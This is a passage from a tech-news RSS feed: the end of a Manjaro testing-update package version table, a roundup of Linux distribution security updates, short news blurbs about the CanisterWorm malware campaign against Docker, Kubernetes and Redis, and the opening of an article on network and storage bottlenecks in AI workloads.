                     python-narwhals             2.18.0-1             2.18.1-1
                        python-numpy              2.4.3-1              2.4.4-1
                         python-onnx           1:1.20.1-1           1:1.20.1-2
              python-onnxruntime-cpu             1.24.4-3             1.24.4-4
             python-onnxruntime-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-cuda             1.24.4-3             1.24.4-4
         python-onnxruntime-opt-rocm             1.24.4-3             1.24.4-4
             python-onnxruntime-rocm             1.24.4-3             1.24.4-4
                       python-opencv             4.13.0-3             4.13.0-4
                  python-opencv-cuda             4.13.0-3             4.13.0-4
              python-openstackclient              8.0.0-1              8.1.0-1
                 python-openstacksdk              4.4.0-2              4.5.0-1
                       python-orjson             3.11.7-1             3.11.7-2
                    python-oslo-i18n              6.7.1-1              6.7.2-1
                      python-plexapi             4.18.0-1             4.18.1-1
                      python-protego              0.4.0-1              0.5.0-1
                     python-protobuf               33.1-4               34.1-1
          python-proton-vpn-api-core             4.16.0-1             4.17.2-1
                 python-pychromecast             14.0.9-4            14.0.10-1
                python-pydantic-core           3:2.41.5-3           3:2.41.5-4
                       python-pygit2             1.19.1-2             1.19.2-1
                     python-pypandoc             1.16.2-1               1.17-1
                     python-pypubsub             4.0.3-11              4.0.4-1
                       python-pysdl3           0.9.10b0-1           0.9.11b0-1
                      python-pytorch             2.10.0-3             2.10.0-4
                 python-pytorch-cuda             2.10.0-3             2.10.0-4
                  python-pytorch-opt             2.10.0-3             2.10.0-4
             python-pytorch-opt-cuda             2.10.0-3             2.10.0-4
             python-pytorch-opt-rocm             2.10.0-3             2.10.0-4
                 python-pytorch-rocm             2.10.0-3             2.10.0-4
                        python-regex          2026.2.28-1          2026.3.32-1
                     python-requests             2.32.5-4             2.33.1-1
              python-setuptools-rust             1.12.0-3             1.12.1-1
                        python-sybil              6.1.1-2              7.0.0-1
                    python-testtools              2.8.3-2              2.8.4-1
                      python-textual              8.1.1-1              8.2.1-1
                        python-tomli              2.4.0-1              2.4.1-1
                          python-tox             4.32.0-1             4.33.0-1
                       python-triton              3.5.1-3              3.5.1-4
                        python-urwid              3.0.5-1              4.0.0-1
                   python-validators             0.30.0-1             0.31.0-1
                        python-w3lib              2.3.0-2              2.3.1-1
                     python-werkzeug              3.1.5-1              3.1.6-1
                    python-z3-solver             4.15.4-2             4.16.0-1
                                qgis              4.0.0-1              4.0.0-2
                            qt6-grpc             6.11.0-1             6.11.0-2
                          quickshell              0.2.1-5              0.2.1-6
                           qwen-code             0.13.1-1             0.13.2-1
                            r2ghidra              5.9.8-1              6.1.2-1
                             radare2              5.9.8-1              6.1.2-1
                               razor               2.86-3               2.87-2
                                 re2       2:2025.11.05-1       2:2025.11.05-3
                              reaper               7.66-1               7.67-1
                               rizin              0.8.1-2              0.8.2-1
                               rocal              7.2.0-1              7.2.0-2
                          rofi-emoji              4.1.0-2              4.1.0-3
                          rpi-imager              2.0.6-2              2.0.6-3
                          rubberband              4.0.0-1              4.0.0-2
                   rubberband-ladspa              4.0.0-1              4.0.0-2
                      rubberband-lv2              4.0.0-1              4.0.0-2
                     rubberband-vamp              4.0.0-1              4.0.0-2
                    ruby-addressable              2.8.8-1              2.8.9-1
                          ruby-async             2.34.0-1             2.38.1-1
                ruby-async-container             0.31.0-1             0.34.4-1
                     ruby-async-pool             0.11.1-1             0.11.2-1
                  ruby-async-service             0.19.1-1             0.21.0-1
                     ruby-chef-utils            19.2.27-1            19.2.32-1
                ruby-google-protobuf               33.1-4               34.1-1
                           ruby-grpc             1.78.1-1             1.80.0-1
                       ruby-io-event             1.14.2-1             1.14.5-1
                         ruby-loofah             2.25.0-1             2.25.1-1
                            ruby-lsp             0.26.6-1             0.26.9-1
                       ruby-maxitest              6.1.0-1              6.2.0-1
            ruby-net-http-persistent              4.0.7-1              4.0.8-1
                  ruby-protocol-http             0.59.0-1             0.60.0-1
                  ruby-protocol-rack             0.21.1-1             0.22.0-1
                  ruby-public_suffix              7.0.2-1              7.0.5-1
           ruby-rails-html-sanitizer              1.6.2-3              1.7.0-1
            ruby-repl_type_completor             0.1.13-1             0.1.15-1
                         ruby-sequel             5.99.0-1            5.101.0-1
                 ruby-sorbet-runtime          0.6.12942-1          0.6.13068-1
                        ruby-sqlite3              2.9.1-1              2.9.2-1
        ruby-sus-fixtures-async-http             0.12.0-1             0.12.1-1
                       ruby-zeitwerk              2.7.3-1              2.7.5-1
                      rustypaste-cli              0.9.4-1              0.9.5-1
                           rz-cutter              2.4.1-5              2.4.1-6
                                sbcl              2.6.2-1              2.6.3-1
                           scap-dkms             0.20.0-9             0.23.1-1
                             scummvm           2026.1.0-1           2026.2.0-1
                          sentry-cli              3.3.4-1              3.3.5-1
                       sentry-native             0.13.3-1             0.13.4-1
                               sfizz              1.2.3-8             1.2.3-10
                           sfizz-lib              1.2.3-8             1.2.3-10
                           sfizz-lv2             1.2.3-12             1.2.3-13
                    sfizz-standalone              1.2.3-8             1.2.3-10
                            sfizz-ui             1.2.3-12             1.2.3-13
                          sfizz-vst3             1.2.3-12             1.2.3-13
                         shadowsocks    3.0.0a.20180219-9                    -
                          shellcheck            0.11.0-79            0.11.0-81
                            skaffold             2.18.0-1             2.18.2-1
                                skim              4.0.1-1              4.2.0-1
                         slicer-udev              2.9.4-7              2.9.4-8
                            smplayer             25.6.0-1             25.6.0-2
                            soapyuhd             0.4.1-14             0.4.1-15
                      spotify-player             0.22.1-1             0.23.0-1
                           sqlcipher             4.13.0-1             4.14.0-1
                            sqlfluff              4.0.4-2              4.1.0-1
                             sslscan              2.2.1-1              2.2.2-1
                               stack          2.9.3.1-118          2.9.3.1-123
                             step-ca             0.29.0-1             0.30.2-1
                          strongswan              6.0.4-2              6.0.5-1
                             stumpwm              24.11-9             24.11-10
                     stylish-haskell          0.14.5.0-11          0.14.5.0-13
                               swtpm             0.10.1-1             0.10.1-2
                                 syd             3.51.0-1             3.51.2-1
                           syslog-ng             4.11.0-1             4.11.0-2
                      syslog-ng-amqp             4.11.0-1             4.11.0-2
                    syslog-ng-geoip2             4.11.0-1             4.11.0-2
                     syslog-ng-kafka             4.11.0-1             4.11.0-2
                   syslog-ng-mongodb             4.11.0-1             4.11.0-2
                    syslog-ng-python             4.11.0-1             4.11.0-2
                     syslog-ng-redis             4.11.0-1             4.11.0-2
                      syslog-ng-smtp             4.11.0-1             4.11.0-2
                      syslog-ng-snmp             4.11.0-1             4.11.0-2
                       syslog-ng-sql             4.11.0-1             4.11.0-2
                             systing              1.0.0-1              1.0.0-2
                            taffybar             4.1.0-13             4.1.0-18
                      tamarin-prover            1.12.0-10            1.12.0-14
                     taskwarrior-tui             0.26.7-1             0.26.8-1
                     tauon-music-box              9.1.1-1              9.1.2-1
                    telegram-desktop              6.6.4-6              6.6.4-7
                          terragrunt             0.99.4-2             0.99.5-1
                              thunar             4.20.7-1             4.20.8-1
                         thunderbird              149.0-1            149.0.1-1
                 thunderbird-i18n-af              149.0-1            149.0.1-1
                 thunderbird-i18n-ar              149.0-1            149.0.1-1
                thunderbird-i18n-ast              149.0-1            149.0.1-1
                 thunderbird-i18n-be              149.0-1            149.0.1-1
                 thunderbird-i18n-bg              149.0-1            149.0.1-1
                 thunderbird-i18n-br              149.0-1            149.0.1-1
                 thunderbird-i18n-ca              149.0-1            149.0.1-1
                thunderbird-i18n-cak              149.0-1            149.0.1-1
                 thunderbird-i18n-cs              149.0-1            149.0.1-1
                 thunderbird-i18n-cy              149.0-1            149.0.1-1
                 thunderbird-i18n-da              149.0-1            149.0.1-1
                 thunderbird-i18n-de              149.0-1            149.0.1-1
                thunderbird-i18n-dsb              149.0-1            149.0.1-1
                 thunderbird-i18n-el              149.0-1            149.0.1-1
              thunderbird-i18n-en-gb              149.0-1            149.0.1-1
              thunderbird-i18n-en-us              149.0-1            149.0.1-1
              thunderbird-i18n-es-ar              149.0-1            149.0.1-1
              thunderbird-i18n-es-es              149.0-1            149.0.1-1
                 thunderbird-i18n-et              149.0-1            149.0.1-1
                 thunderbird-i18n-eu              149.0-1            149.0.1-1
                 thunderbird-i18n-fi              149.0-1            149.0.1-1
                 thunderbird-i18n-fr              149.0-1            149.0.1-1
              thunderbird-i18n-fy-nl              149.0-1            149.0.1-1
              thunderbird-i18n-ga-ie              149.0-1            149.0.1-1
                 thunderbird-i18n-gd              149.0-1            149.0.1-1
                 thunderbird-i18n-gl              149.0-1            149.0.1-1
                 thunderbird-i18n-he              149.0-1            149.0.1-1
                 thunderbird-i18n-hr              149.0-1            149.0.1-1
                thunderbird-i18n-hsb              149.0-1            149.0.1-1
                 thunderbird-i18n-hu              149.0-1            149.0.1-1
              thunderbird-i18n-hy-am              149.0-1            149.0.1-1
                 thunderbird-i18n-id              149.0-1            149.0.1-1
                 thunderbird-i18n-is              149.0-1            149.0.1-1
                 thunderbird-i18n-it              149.0-1            149.0.1-1
                 thunderbird-i18n-ja              149.0-1            149.0.1-1
                 thunderbird-i18n-ka              149.0-1            149.0.1-1
                thunderbird-i18n-kab              149.0-1            149.0.1-1
                 thunderbird-i18n-kk              149.0-1            149.0.1-1
                 thunderbird-i18n-ko              149.0-1            149.0.1-1
                 thunderbird-i18n-lt              149.0-1            149.0.1-1
                 thunderbird-i18n-ms              149.0-1            149.0.1-1
              thunderbird-i18n-nb-no              149.0-1            149.0.1-1
                 thunderbird-i18n-nl              149.0-1            149.0.1-1
              thunderbird-i18n-nn-no              149.0-1            149.0.1-1
              thunderbird-i18n-pa-in              149.0-1            149.0.1-1
                 thunderbird-i18n-pl              149.0-1            149.0.1-1
              thunderbird-i18n-pt-br              149.0-1            149.0.1-1
              thunderbird-i18n-pt-pt              149.0-1            149.0.1-1
                 thunderbird-i18n-rm              149.0-1            149.0.1-1
                 thunderbird-i18n-ro              149.0-1            149.0.1-1
                 thunderbird-i18n-ru              149.0-1            149.0.1-1
                 thunderbird-i18n-sk              149.0-1            149.0.1-1
                 thunderbird-i18n-sl              149.0-1            149.0.1-1
                 thunderbird-i18n-sq              149.0-1            149.0.1-1
                 thunderbird-i18n-sr              149.0-1            149.0.1-1
              thunderbird-i18n-sv-se              149.0-1            149.0.1-1
                 thunderbird-i18n-th              149.0-1            149.0.1-1
                 thunderbird-i18n-tr              149.0-1            149.0.1-1
                 thunderbird-i18n-uk              149.0-1            149.0.1-1
                 thunderbird-i18n-uz              149.0-1            149.0.1-1
                 thunderbird-i18n-vi              149.0-1            149.0.1-1
              thunderbird-i18n-zh-cn              149.0-1            149.0.1-1
              thunderbird-i18n-zh-tw              149.0-1            149.0.1-1
                         timescaledb             2.26.0-1             2.26.1-1
             timescaledb-old-upgrade             2.26.0-1             2.26.1-1
                       tokio-console             0.1.14-1             0.1.14-2
                             traefik             3.6.11-1             3.6.12-1
                                tree              2.3.1-1              2.3.2-1
                             udiskie              2.6.1-1              2.6.2-1
                         udisks2-qt5              5.0.6-2                    -
              ultramaster-kr106-clap              2.4.4-1            2.4.6.1-1
               ultramaster-kr106-lv2              2.4.4-1            2.4.6.1-1
              ultramaster-kr106-vst3              2.4.4-1            2.4.6.1-1
                               usage             2.18.2-1              3.2.0-1
                            usbguard              1.1.4-4              1.1.4-5
                                vala            0.56.18-5            0.56.19-1
                             vcspull             1.58.0-1             1.58.1-1
                    vhba-module-dkms          20250329-70          20250329-71
                                 vim           9.2.0204-2           9.2.0272-1
                         vim-runtime           9.2.0204-2           9.2.0272-1
                                 vis 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
             vis-syntax-highlighting 0.9.r397.gda84fe70-1 0.9.r399.g1a4fb0fd-1
                                 vlc             3.0.22-1             3.0.22-2
                             vlc-cli             3.0.22-1             3.0.22-2
                     vlc-gui-ncurses             3.0.22-1             3.0.22-2
                          vlc-gui-qt             3.0.22-1             3.0.22-2
                      vlc-gui-skins2             3.0.22-1             3.0.22-2
                   vlc-plugin-a52dec             3.0.22-1             3.0.22-2
                    vlc-plugin-aalib             3.0.22-1             3.0.22-2
                     vlc-plugin-alsa             3.0.22-1             3.0.22-2
                      vlc-plugin-aom             3.0.22-1             3.0.22-2
                  vlc-plugin-archive             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb24             3.0.22-1             3.0.22-2
                  vlc-plugin-aribb25             3.0.22-1             3.0.22-2
                      vlc-plugin-ass             3.0.22-1             3.0.22-2
                    vlc-plugin-avahi             3.0.22-1             3.0.22-2
                   vlc-plugin-bluray             3.0.22-1             3.0.22-2
                     vlc-plugin-caca             3.0.22-1             3.0.22-2
                     vlc-plugin-cddb             3.0.22-1             3.0.22-2
               vlc-plugin-chromecast             3.0.22-1             3.0.22-2
                    vlc-plugin-dav1d             3.0.22-1             3.0.22-2
                     vlc-plugin-dbus             3.0.22-1             3.0.22-2
         vlc-plugin-dbus-screensaver             3.0.22-1             3.0.22-2
                      vlc-plugin-dca             3.0.22-1             3.0.22-2
                      vlc-plugin-dvb             3.0.22-1             3.0.22-2
                      vlc-plugin-dvd             3.0.22-1             3.0.22-2
                    vlc-plugin-faad2             3.0.22-1             3.0.22-2
                   vlc-plugin-ffmpeg             3.0.22-1             3.0.22-2
                 vlc-plugin-firewire             3.0.22-1             3.0.22-2
                     vlc-plugin-flac             3.0.22-1             3.0.22-2
               vlc-plugin-fluidsynth             3.0.22-1             3.0.22-2
                 vlc-plugin-freetype             3.0.22-1             3.0.22-2
                      vlc-plugin-gme             3.0.22-1             3.0.22-2
                   vlc-plugin-gnutls             3.0.22-1             3.0.22-2
                vlc-plugin-gstreamer             3.0.22-1             3.0.22-2
                  vlc-plugin-inflate             3.0.22-1             3.0.22-2
                     vlc-plugin-jack             3.0.22-1             3.0.22-2
                  vlc-plugin-journal             3.0.22-1             3.0.22-2
                     vlc-plugin-jpeg             3.0.22-1             3.0.22-2
                     vlc-plugin-kate             3.0.22-1             3.0.22-2
                  vlc-plugin-kwallet             3.0.22-1             3.0.22-2
                vlc-plugin-libsecret             3.0.22-1             3.0.22-2
                     vlc-plugin-lirc             3.0.22-1             3.0.22-2
                  vlc-plugin-live555             3.0.22-1             3.0.22-2
                      vlc-plugin-lua             3.0.22-1             3.0.22-2
                      vlc-plugin-mad             3.0.22-1             3.0.22-2
                 vlc-plugin-matroska             3.0.22-1             3.0.22-2
                     vlc-plugin-mdns             3.0.22-1             3.0.22-2
                  vlc-plugin-modplug             3.0.22-1             3.0.22-2
                    vlc-plugin-mpeg2             3.0.22-1             3.0.22-2
                   vlc-plugin-mpg123             3.0.22-1             3.0.22-2
                      vlc-plugin-mtp             3.0.22-1             3.0.22-2
                 vlc-plugin-musepack             3.0.22-1             3.0.22-2
                      vlc-plugin-nfs             3.0.22-1             3.0.22-2
                   vlc-plugin-notify             3.0.22-1             3.0.22-2
                      vlc-plugin-ogg             3.0.22-1             3.0.22-2
                     vlc-plugin-opus             3.0.22-1             3.0.22-2
                      vlc-plugin-png             3.0.22-1             3.0.22-2
                    vlc-plugin-pulse             3.0.22-1             3.0.22-2
                vlc-plugin-quicksync             3.0.22-1             3.0.22-2
               vlc-plugin-samplerate             3.0.22-1             3.0.22-2
                      vlc-plugin-sdl             3.0.22-1             3.0.22-2
                     vlc-plugin-sftp             3.0.22-1             3.0.22-2
                    vlc-plugin-shout             3.0.22-1             3.0.22-2
                      vlc-plugin-smb             3.0.22-1             3.0.22-2
                     vlc-plugin-soxr             3.0.22-1             3.0.22-2
                    vlc-plugin-speex             3.0.22-1             3.0.22-2
                      vlc-plugin-srt             3.0.22-1             3.0.22-2
                      vlc-plugin-svg             3.0.22-1             3.0.22-2
                      vlc-plugin-tag             3.0.22-1             3.0.22-2
                   vlc-plugin-theora             3.0.22-1             3.0.22-2
                  vlc-plugin-twolame             3.0.22-1             3.0.22-2
                     vlc-plugin-udev             3.0.22-1             3.0.22-2
                     vlc-plugin-upnp             3.0.22-1             3.0.22-2
                   vlc-plugin-vorbis             3.0.22-1             3.0.22-2
                      vlc-plugin-vpx             3.0.22-1             3.0.22-2
                     vlc-plugin-x264             3.0.22-1             3.0.22-2
                     vlc-plugin-x265             3.0.22-1             3.0.22-2
                      vlc-plugin-xml             3.0.22-1             3.0.22-2
                     vlc-plugin-zvbi             3.0.22-1             3.0.22-2
                     vlc-plugins-all             3.0.22-1             3.0.22-2
                    vlc-plugins-base             3.0.22-1             3.0.22-2
                   vlc-plugins-extra             3.0.22-1             3.0.22-2
            vlc-plugins-video-output             3.0.22-1             3.0.22-2
           vlc-plugins-visualization             3.0.22-1             3.0.22-2
                              vmexec              0.4.0-1              0.5.2-1
                                vpnc  1:0.5.3.r539.r239-1  1:0.5.3.r557.r241-1
                         warzone2100              4.6.3-2              4.6.3-3
                           watchexec              2.5.0-1              2.5.1-1
             webrtc-audio-processing                2.1-5                2.1-6
                         wireplumber             0.5.13-2             0.5.14-1
                    wireplumber-docs             0.5.13-2             0.5.14-1
                       wireshark-cli              4.6.4-1              4.6.4-2
                        wireshark-qt              4.6.4-1              4.6.4-2
              xdg-desktop-portal-dde             1.0.13-7             1.0.14-1
                           xdp-tools              1.6.2-1              1.6.3-1
                           xfdesktop             4.20.1-3             4.20.2-1
                              xmobar             0.50-137             0.50-141
                              xmonad           0.18.0-154           0.18.0-156
                      xmonad-contrib           0.18.1-138           0.18.1-140
                         xmonad-dbus          0.1.0.2-240          0.1.0.2-243
                       xmonad-extras             0.17.3-6             0.17.3-9
                      xorg-setxkbmap              1.3.4-2              1.3.5-1
                                 xrt          1:2.21.75-5          1:2.21.75-6
                          xtrabackup            8.4.0_5-1            8.4.0_5-2
                                  z3             4.15.4-2             4.16.0-1
                             z3-java             4.15.4-2             4.16.0-1
                             zathura         2026.02.22-1         2026.03.27-1
                          zathura-cb         2026.02.03-3         2026.02.03-4
                        zathura-djvu         2026.02.03-3         2026.02.03-4
                   zathura-pdf-mupdf         2026.02.03-5         2026.02.03-6
                 zathura-pdf-poppler         2026.02.03-3         2026.02.03-4
                          zathura-ps         2026.02.03-3         2026.02.03-4
                              zettlr              4.3.0-1              4.3.1-1
                              zypper            1.14.95-1            1.14.95-2
                            ares-emu                    -                147-2
                             diffoci                    -              0.1.8-1
                         govulncheck                    -              1.1.4-1
                       libkysdk-base                    -            3.0.1.0-1
                         librashader                    -             0.10.1-2
                       python-podman                    -              5.8.0-2
                        python-pylxd                    -              2.4.0-2
                        python-ws4py                    -              0.6.0-4
                         udisks2-qt6                    -              6.0.1-1


:: Different sync package(s) in repository multilib x86_64

-------------------------------------------------------------------------------
                             PACKAGE           2026-03-28           2026-03-31
-------------------------------------------------------------------------------
                         lib32-clang             22.1.1-1             22.1.2-1
              lib32-gst-plugins-base             1.28.1-2             1.28.1-3
         lib32-gst-plugins-base-libs             1.28.1-2             1.28.1-3
              lib32-gst-plugins-good             1.28.1-2             1.28.1-3
                     lib32-gstreamer             1.28.1-2             1.28.1-3
                        lib32-libvpx             1.15.2-2             1.16.0-2
                          lib32-llvm           1:22.1.1-1           1:22.1.2-1
                     lib32-llvm-libs           1:22.1.1-1           1:22.1.2-1
</code></pre>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-03-31-linux-7-0-rc6-thunderbird-deepin-freecad-wireplumber-haskell/186720">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, golang, and ncurses), Debian (asterisk, bind9, gst-plugins-base1.0, gst-plugins-ugly1.0, gvfs, incus, libxml-parser-perl, nodejs, php-phpseclib, php-phpseclib3, phpseclib, and strongswan), Fedora (bcftools, bind, bind-dyndb-ldap, chromium, ...]]></description>
<link>https://tsecurity.de/de/3393152/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393152/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 30 Mar 2026 15:11:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, golang, and ncurses), <b>Debian</b> (asterisk, bind9, gst-plugins-base1.0, gst-plugins-ugly1.0, gvfs, incus, libxml-parser-perl, nodejs, php-phpseclib, php-phpseclib3, phpseclib, and strongswan), <b>Fedora</b> (bcftools, bind, bind-dyndb-ldap, chromium, dotnet10.0, dotnet8.0, dotnet9.0, giflib, htslib, libsoup3, libtasn1, maturin, mingw-expat, mingw-freetype, mongo-c-driver, perl-XML-Parser, php-phpseclib, php-phpseclib3, pypy, pypy3.10, pypy3.11, python-cryptography, python-fastar, python-ply, python-pycparser, python-uv-build, python3.11, python3.12, python3.13, python3.6, roundcubemail, rubygem-json, rust-ambient-id, rust-astral-reqwest-middleware, rust-astral-reqwest-retry, rust-astral-tokio-tar, rust-astral_async_http_range_reader, rust-cargo-c, rust-ingredients, rust-native-tls, rust-nix, rust-openssl-probe, rust-openssl-probe0.1, rust-pty-process, rust-reqsign, rust-reqsign-aliyun-oss, rust-reqsign-aws-v4, rust-reqsign-azure-storage, rust-reqsign-command-execute-tokio, rust-reqsign-core, rust-reqsign-file-read-tokio, rust-reqsign-google, rust-reqsign-http-send-reqwest, rust-reqsign-huaweicloud-obs, rust-reqsign-tencent-cos, rust-rustls-native-certs, rust-sequoia-chameleon-gnupg, rust-tar, rust-webpki-root-certs, rustup, samtools, suricata, uv, and vim), <b>Mageia</b> (cmake, libpng, nodejs, python-ujson, and strongswan), <b>Red Hat</b> (python3 and python3.9), <b>SUSE</b> (389-ds, amazon-cloudwatch-agent, capstone, chromium, containerd, cosign, curl, docker-compose, docker-stable, exiv2, expat, firefox, freeipmi, freerdp, gimp, glusterfs, govulncheck-vulndb, gstreamer-plugins-ugly, jupyter-bqplot-jupyterlab, jupyter-jupyterlab-templates, jupyter-matplotlib, kea, kernel, libsodium, libtpms-devel, LibVNCServer, nghttp2, nginx, poppler, python-dynaconf, python-ldap, python-nltk, python-orjson, python-pyasn1, python-pydicom, python-PyJWT, python-pyopenssl, python-tornado6, python311, python311-cbor2, python311-deepdiff, python311-intake, python311-jsonpath-ng, python311-lmdb, python311-oci-sdk, python312, rclone, redis, salt, tomcat11, v2ray-core, and vim), and <b>Ubuntu</b> (linux-ibm-5.4).]]></content:encoded>
</item>
<item>
<title><![CDATA[CanisterWorm Malware Attacking Docker/K8s/Redis to Gain Access and Steal Secrets]]></title>
<description><![CDATA[A financially motivated cybercrime group has been quietly compromising cloud environments since late 2025, and its activities are now drawing serious concern across the security community. The group, known as TeamPCP, operates a self-propagating worm called CanisterWorm that hunts for…
Read more ...]]></description>
<link>https://tsecurity.de/de/3393136/it-security-nachrichten/canisterworm-malware-attacking-dockerk8sredis-to-gain-access-and-steal-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393136/it-security-nachrichten/canisterworm-malware-attacking-dockerk8sredis-to-gain-access-and-steal-secrets/</guid>
<pubDate>Mon, 30 Mar 2026 15:08:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A financially motivated cybercrime group has been quietly compromising cloud environments since late 2025, and its activities are now drawing serious concern across the security community. The group, known as TeamPCP, operates a self-propagating worm called CanisterWorm that hunts for…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/canisterworm-malware-attacking-docker-k8s-redis-to-gain-access-and-steal-secrets/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/canisterworm-malware-attacking-docker-k8s-redis-to-gain-access-and-steal-secrets/">CanisterWorm Malware Attacking Docker/K8s/Redis to Gain Access and Steal Secrets</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CanisterWorm Malware Attacking Docker/K8s/Redis to Gain Access and Steal Secrets]]></title>
<description><![CDATA[A financially motivated cybercrime group has been quietly compromising cloud environments since late 2025, and its activities are now drawing serious concern across the security community. The group, known as TeamPCP, operates a self-propagating worm called CanisterWorm that hunts for poorly secu...]]></description>
<link>https://tsecurity.de/de/3393068/it-security-nachrichten/canisterworm-malware-attacking-dockerk8sredis-to-gain-access-and-steal-secrets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3393068/it-security-nachrichten/canisterworm-malware-attacking-dockerk8sredis-to-gain-access-and-steal-secrets/</guid>
<pubDate>Mon, 30 Mar 2026 14:52:56 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A financially motivated cybercrime group has been quietly compromising cloud environments since late 2025, and its activities are now drawing serious concern across the security community. The group, known as TeamPCP, operates a self-propagating worm called CanisterWorm that hunts for poorly secured Docker APIs, Kubernetes clusters, Redis servers, and systems vulnerable to the React2Shell flaw. […]</p>
<p>The post <a href="https://cybersecuritynews.com/canisterworm-malware-attacking-docker/">CanisterWorm Malware Attacking Docker/K8s/Redis to Gain Access and Steal Secrets</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New CanisterWorm Malware Hits Docker, K8s, Redis Environments]]></title>
<description><![CDATA[A financially motivated cybercrime group known as TeamPCP has launched a destructive new campaign targeting cloud environments. The group is attempting to inject itself into ongoing geopolitical conflicts by unleashing “CanisterWorm,” a self-propagating malware that wipes data on infected systems...]]></description>
<link>https://tsecurity.de/de/3392887/it-security-nachrichten/new-canisterworm-malware-hits-docker-k8s-redis-environments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3392887/it-security-nachrichten/new-canisterworm-malware-hits-docker-k8s-redis-environments/</guid>
<pubDate>Mon, 30 Mar 2026 13:53:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A financially motivated cybercrime group known as TeamPCP has launched a destructive new campaign targeting cloud environments. The group is attempting to inject itself into ongoing geopolitical conflicts by unleashing “CanisterWorm,” a self-propagating malware that wipes data on infected systems located in Iran or configured to use Farsi as the default language. The worm spreads […]</p>
<p>The post <a href="https://cyberpress.org/canisterworm-hits-containers/">New CanisterWorm Malware Hits Docker, K8s, Redis Environments</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Network and storage patterns for AI workloads: The overlooked bottleneck]]></title>
<description><![CDATA[I used to think AI performance was mostly a GPU problem. 



Then I watched a “healthy” GPU fleet crawl. Not because we ran out of compute, but because we ran out of movement. Tokens waiting on data. GPUs waiting on batches. Services waiting on east-to-west traffic. Storage queues quietly turning...]]></description>
<link>https://tsecurity.de/de/3392442/it-security-nachrichten/network-and-storage-patterns-for-ai-workloads-the-overlooked-bottleneck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3392442/it-security-nachrichten/network-and-storage-patterns-for-ai-workloads-the-overlooked-bottleneck/</guid>
<pubDate>Mon, 30 Mar 2026 11:22:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I used to think AI performance was mostly a GPU problem. </p>



<p>Then I watched a “healthy” GPU fleet crawl. Not because we ran out of compute, but because we ran out of movement. Tokens waiting on data. GPUs waiting on batches. Services waiting on east-to-west traffic. Storage queues quietly turning into tail latency. </p>



<p>Today, I do not even call this a storage problem. It is an information supply chain problem. In real enterprise AI, data is scattered across on-prem, cloud and edge footprints. Training and inference cycles get longer. Expensive resources like GPUs stay scarce. And the system pays a time tax every time data has to hop, copy, translate or wait. <a href="https://www.ibm.com/solutions/ai-storage" target="_blank" rel="noreferrer noopener">IBM</a> frames AI storage in this same “supply chain” reality, especially as organizations modernize for distributed data and AI at scale.  </p>



<p>If you are running AI in production, especially LLM inference and retrieval augmented generation (RAG), the network and storage layer is where “it works” becomes “it works reliably at scale.” </p>



<p>This is my field guide to the patterns that matter, the metrics that expose bottlenecks quickly and the open-source tools that can help you fix them. </p>



<h2 class="wp-block-heading">The metric shift: From averages to tail latency </h2>



<p>Traditional infrastructure teams love averages. AI punishes that mindset. </p>



<p>For LLM inference, user experience is governed by two numbers: </p>



<ul class="wp-block-list">
<li><strong>Time to first token (TTFT):</strong> How long users wait before they see the first token.  </li>
</ul>



<ul class="wp-block-list">
<li><strong>Time per output token (TPOT):</strong> How smoothly tokens stream after the first one.  </li>
</ul>



<p><a href="https://github.com/mlcommons/inference_policies/blob/master/inference_rules.adoc?" target="_blank" rel="noreferrer noopener">MLCommons</a> uses TTFT and TPOT in its LLM inference benchmarking rules because they reflect what users feel, not what a mean value hides. </p>



<p>Once you track TTFT and TPOT in percentiles (p95 and p99), the network and storage layer stops being “someone else’s problem” and becomes an architectural priority. </p>



<h2 class="wp-block-heading">Two traffic shapes, two different bottlenecks </h2>



<p>Most enterprise AI systems fall into two traffic shapes that break different things. </p>



<h3 class="wp-block-heading">Shape 1: Training and batch analytics </h3>



<ul class="wp-block-list">
<li>Big sequential reads and writes  </li>
</ul>



<ul class="wp-block-list">
<li>Dataset shuffles and checkpoints  </li>
</ul>



<ul class="wp-block-list">
<li>Distributed training traffic across nodes  </li>
</ul>



